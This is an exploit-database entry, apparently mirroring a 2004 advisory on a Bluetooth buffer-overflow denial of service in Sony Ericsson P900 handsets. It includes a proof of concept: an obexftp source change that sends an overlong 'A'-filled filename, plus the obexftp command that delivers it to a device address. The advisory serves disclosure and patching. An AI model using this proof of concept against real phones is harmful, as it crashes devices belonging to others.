header-logo
Suggest Exploit
vendor:
P900
by:
SecurityFocus
7.5
CVSS
HIGH
Remote Denial of Service
119
CWE
Product Name: P900
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2004

Sony Ericsson P900 Remote Denial of Service Vulnerability

A remote denial of service vulnerability exists in Sony Ericsson P900 handsets due to the application failing to perform boundary checks prior to copying user-supplied data into a finite sized buffer. The vulnerability presents itself in the Bluetooth-related Beamer application when handling a malformed file. To exploit this vulnerability, an attacker can create a malformed name using 'remotename' in 'obexftp_put_file' function of obexftp client.c and send any existing file using obexftp.

Mitigation:

Upgrade to the latest version of Sony Ericsson P900 handset.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13782/info

Sony Ericsson P900 handset is affected by a remote denial of service vulnerability. This issue arises because the application fails to perform boundary checks prior to copying user-supplied data into a finite sized buffer.

The vulnerability presents itself in the Bluetooth-related Beamer application when handling a malformed file.

Sony Ericsson P900 handset is reportedly affected, however, other handsets such as Sony Ericsson P800 may be vulnerable as well. 

Create a malformed name using 'remotename' in 'obexftp_put_file' function of obexftp client.c:

---- snip ---
object = build_object_from_file (cli->obexhandle,localname, \
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
---- snip ---

Chose any existing file and send it using obexftp:
# ./obexftp -b 00:0A:D9:E7:0B:1D --channel 2 -p /etc/passwd -v

Navigation

Suggest Exploit

Services By CQR